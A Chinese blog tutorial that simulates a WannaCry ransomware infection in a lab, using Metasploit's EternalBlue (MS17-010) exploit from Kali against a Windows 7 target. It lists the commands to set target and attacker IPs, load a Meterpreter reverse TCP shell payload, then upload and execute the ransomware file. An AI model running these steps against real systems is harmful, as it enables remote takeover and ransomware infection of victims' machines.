2. 程式人生 > >勒索病毒場景模擬及原理

勒索病毒場景模擬及原理

阿新 發佈:2019-03-29
慎用 進行 -c 傳輸 應用 win fff inf 攻擊

一、環境準備

需準備如下環境及工具:

1) 一臺攻擊虛機(Kali linux),一臺靶機(Win7 64位)

3) 永恒之藍(wannacry)病毒文件

二、環境準備

1.在kali linux下啟動msfconsole

通過該應用,可以訪問和使用所有的metasploit的插件,payload,利用模塊,post模塊等。

root@kali:~#msfconsole

技術分享圖片

2.利用永恒之藍MS17-010漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

技術分享圖片

3. 設定靶機 IP 和操作機 IP

172.22.170.4為操作機kali-linux ip地址
172.22.171.4為靶機windows 7 ip地址

msf exploit (windows/smb/ms17_010_eternalblue) >  set rhost 172.22.171.4
msf exploit (windows/smb/ms17_010_eternalblue) >  set lhost 172.22.170.4

技術分享圖片

技術分享圖片

4.設置TCP連接

使用meterpreter編寫的TCP反彈連接木馬,用於在滲透成功後向攻擊機發起連接請求進一步控制靶機的模塊。

set payload windows/x64/meterpreter/reverse_tcp

技術分享圖片

技術分享圖片

技術分享圖片

5.進行滲透

界面如下顯示,則表示滲透成功

技術分享圖片

6.向目標主機傳輸病毒文件(慎用,僅用於實驗測試)

技術分享圖片

成功傳輸

技術分享圖片

6.在目標主機上執行該病毒文件

execute -f C:\\Wannacry.exe

7.目標主機被攻陷

技術分享圖片

勒索病毒場景模擬及原理

相關推薦

勒索病毒場景模擬原理

慎用 進行 -c 傳輸 應用 win fff inf 攻擊 一、環境準備 需準備如下環境及工具: 1) 一臺攻擊虛機(Kali linux),一臺靶機(Win7 64位) 3) 永恒之藍(wannacry)病毒文件 二、環境準備 1.在kali

勒索病毒的介紹防範

從昨天開始,許久不見的計算機病毒又開始了全球性的爆發,此次爆發的是勒索病毒。上一次如此規模爆發並導致不良後果的,筆者印象裡好像還是多年前的CIH。廢話不多說,此次勒索病毒正在蔓延,作為普通計算機使用者,我們應該怎麼做? 中毒介面 病毒特徵: 此次病毒會將系統上的大量

最新後綴.*4444後綴勒索病毒文件SQL Server數據庫修復方案

shadow 防護 密碼 文件 安全 技術 alt pos 安裝 近期GlobeImposter變種在國內較大範圍內傳播,網絡安全研究員提醒用戶加強防範,應對此類勒索軟件***。 威脅概述近期我們發現GlobeImposter3.0變種勒索病毒在國內較大範圍內傳播。

Satan勒索病毒家族追蹤安全防禦解密方法

img 分享圖片 主機 方法 images 應該 時間 通過 其它 一、家族簡介撒旦(Satan)病毒是一款惡意勒索程序,首次出現2017年1月份。Satan病毒的開發者通過網站允許用戶生成自己的Satan變種,並且提供CHM和帶宏腳本Word文檔的下載器生成腳本進行傳播。

2019年4月最新勒索病毒樣本分析數據恢復

cal RoCE gmail proc type 安裝 text file gic 1. satan病毒升級變種satan_pro特征:.satan_pro 後綴勒索郵箱:[email protected] [email protected] 等 2、

2019年5月最新勒索病毒樣本分析數據恢復

str crypt mage imp elm 其他 img adobe 圖片 一、依然熟悉的“老面孔” 1、GANDCRAB病毒病毒版本:GANDCRAB V5.2中毒特征:<原文件名>.隨機字符串勒索信息:隨機字符串-DECRYPT.txt?隨機字符串-MA

最新勒索軟件病毒防範方法措施

信息安全 鳳凰網 antian365.com simeon1.事件回顧(1)鳳凰網:勒索病毒大範圍傳播,信息安全專家紛紛發出警告http://news.ifeng.com/a/20170513/51086871_0.shtml(2)騰訊網:這種病毒全球大爆發!國內多所大學校園網淪陷,被黑的人都收到了

"永恒之藍"勒索軟件病毒防範方法措施

下載地址 信息安全 武器庫 校園網 目前微軟已發布補丁MS17-010修復了“永恒之藍”攻擊的系統漏洞,請廣大師生盡快根據各自操作系統安裝補丁,地址:https://technet.microsoft.com/zh-cn/library/security/MS17-010;對於XP、2003等

Windows勒索病毒席卷全球:全系列補丁下載解決辦法

免費殺毒軟件 殺毒 中控 根據 操作系統 nsa 運行 比特 亞洲 全網都被Windows比特幣勒索蠕蟲病毒刷屏了,該病毒名為WannaCry(及變種),攻擊了全球多個國家的組織、機構,中國多個高校也紛紛淪陷。據病毒軟件廠商Avast報告稱,至少7.5萬臺計算機

kafka入門:簡介、使用場景、設計原理、主要配置集群搭建(轉)

request 上傳 結構 數據 send gist segments ring 希望 問題導讀: 1.zookeeper在kafka的作用是什麽? 2.kafka中幾乎不允許對消息進行“隨機讀寫”的原因是什麽? 3.kafka集群consumer和producer狀態信息

勒索病毒原理是什麼?中了勒索病毒怎麼辦方法教程

有很多人問我怎麼會中了勒索病毒,為什麼會***我!首先,我們要明白勒索病毒是什麼東西。 勒索病毒跟平常的病毒有本質的區別: 第一:中勒索病毒的檔案沒有感染性,不會進行二次傳播。 第二:勒索病毒是***人為的遠端***行為,通俗講就是,他用一種執行程式,把電腦上的檔案加了一段程式碼,致使檔案打不開。 第

勒索病毒原理是什麽?中了勒索病毒怎麽辦方法教程

感染 的區別 區別 怎麽 重要 隔離 進行 復旦 自動 有很多人問我怎麽會中了勒索病毒,為什麽會***我!首先,我們要明白勒索病毒是什麽東西。 勒索病毒跟平常的病毒有本質的區別: 第一:中勒索病毒的文件沒有感染性,不會進行二次傳播。 第二:勒索病毒是***人為的遠程***行

防範勒索病毒關閉相關埠

噴一噴,網上的傻逼真多! 第一類:文章抄襲,搜一篇一篇的一模一樣,自己不會原創,抄襲的到位! 第二類:只管釋出新聞,沒有提及任何防範的方法和解決辦法! ----------------------------------------------------------------------------

[轉帖]"微信支付"勒索病毒製造者被鎖定 傳播、危害和疫情終極解密 --- 可以學習下一年火絨團隊的分析原理的精神.

"微信支付"勒索病毒製造者被鎖定 傳播、危害和疫情終極解密 https://www.cnbeta.com/articles/tech/794851.htm 12月1日,首個要求"微信支付"贖金的勒索病毒在國內爆發,根據"火絨威脅情報系統"監測和評估,截至4日晚,該病毒至少感染了10萬臺

:Hadoop、NoSQL、分散式、lucene、solr、nutch kafka入門:簡介、使用場景、設計原理、主要配置叢集搭

    需要考慮的影響效能點很多,除磁碟IO之外,我們還需要考慮網路IO,這直接關係到kafka的吞吐量問題.kafka並沒有提供太多高超的技巧;對於producer端,可以將訊息buffer起來,當訊息的條數達到一定閥值時,批量傳送給broker;對於consumer端也是一樣,批量fetch多條訊息.不

盤點那些遭受WannaCry(永恆之藍)勒索病毒的真實場景

WannaCry(中文名:永恆之藍)席捲全球,目前WannaCry已經影響超過100個國家或地區,它已成為全球公敵。它的影響已經不同於以往的系統病毒僅影響個人電腦的使用了,遠超當年“熊貓燒香”病毒的影響面,截止目前,政府、機場、醫院、加油站等等公共機構都有遭受襲擊的案例,很多朋友可能不知道Wanna

【解決方案】Wannacry勒索病毒補丁,下載修復

Windows勒索病毒'Wannacry'修復補丁下載,救命必看! 2017年5月15日 玉林 早晨 大雨  1、如果系統為WINDOWS 7或者WINDOWS 2008系統可下載補丁直接安裝:  下載地址如下: win7/2008r2(32):http://dlied6

勒索病毒工作原理

序言 前些天藉著Windows上的”永恆之藍“漏洞,本來幾乎快銷聲匿跡的加密勒索病毒又重新回到了公眾視線裡。由於電信等網路運營商早就封堵了可能導致中毒的445埠,所以外網影響不大,但是教育網裡的同學就遭殃了,尤其是很多臨畢業的學生紛紛中招,論文被加密,可能

kafka入門:簡介、使用場景、設計原理、主要配置叢集搭建(轉)

問題導讀: 1.zookeeper在kafka的作用是什麼? 2.kafka中幾乎不允許對訊息進行“隨機讀寫”的原因是什麼? 3.kafka叢集consumer和producer狀態資訊是如何儲存的? 4.partitions設計的目的的根本原因是什麼? 一、入門     1、簡介  

kafka入門:簡介、使用場景、設計原理、主要配置叢集搭建

問題導讀: 1.zookeeper在kafka的作用是什麼? 2.kafka中幾乎不允許對訊息進行“隨機讀寫”的原因是什麼? 3.kafka叢集consumer和producer狀態資訊是如何儲存的? 4.partitions設計的目的的根本原因是什麼?